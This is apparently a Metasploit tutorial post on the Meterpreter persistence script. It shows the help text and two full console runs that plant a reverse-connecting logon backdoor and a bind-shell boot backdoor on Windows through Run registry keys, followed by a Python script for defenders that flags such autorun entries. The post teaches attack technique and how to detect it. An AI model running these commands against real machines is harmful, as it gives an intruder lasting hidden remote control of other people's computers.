[MAD-METASPLOIT] 0x34 - Persistence Backdoor
Persistence backdoor
Meterpreter can use Persistence to leave a backdoor on the system, creating a channel for continued access.
meterpreter > run persistence -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value […]
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
Depending on the option, the agent can be set to start at boot, at user logon, and so on.
Creating a backdoor that makes a reverse connection when the user logs on
meterpreter > run persistence -U -i 5 -p 22 -r 192.168.56.101
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value […]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.5914/HAHWUL_20170807.5914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99642 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[+] Agent executed with PID 8068
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb
Creating a backdoor that binds port 22 as soon as the system boots
meterpreter > run persistence -X -i 5 -p 22 -r 192.168.56.101 -P windows/meterpreter/bind_tcp
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value […]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.0044/HAHWUL_20170807.0044.rc
[*] Creating Payload=windows/meterpreter/bind_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99692 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[+] Agent executed with PID 1592
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao
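Both transcripts above end the same way: a randomly named value under a CurrentVersion\Run key (HKCU for -U, HKLM for -X) and a .vbs file in the user's Temp directory. The Python below is an added example for defenders, not part of the original post or of Metasploit; it scans reg query output for Run values of that shape. The sample text is constructed, and the value data being the script path is an assumption based on the transcripts.

```python
import re

# Constructed sample of `reg query <Run key>` output. The two .vbs entries reuse
# the names and paths from the transcripts; value data = script path is assumed.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    ljAYMQEIrbRBJb    REG_SZ    C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    gOuJoRmXcHbUao    REG_SZ    C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
"""

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TEMP%|%TMP%", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b", re.I)


def suspicious_run_values(reg_query_output):
    """Return (key, value name, data, reasons) for autorun values worth a look."""
    findings, key = [], None
    for line in reg_query_output.splitlines():
        if line.startswith("HKEY_"):          # a key header starts a new block
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if not m or key is None or not RUN_KEY.search(key):
            continue
        data, reasons = m.group("data"), []
        if TEMP_DIR.search(data):
            reasons.append("runs from a temp directory")
        if SCRIPT_EXT.search(data):
            reasons.append("launches a script file")
        if reasons:
            findings.append((key, m.group("name"), data, reasons))
    return findings


if __name__ == "__main__":
    for key, name, data, reasons in suspicious_run_values(SAMPLE_REG_QUERY):
        print(f"{key}\\{name} -> {data} ({'; '.join(reasons)})")
```

The cleanup resource file named in each transcript is the operator-side way to remove the agent; on the host, a flagged value and the script it points to are the artifacts to collect and remove.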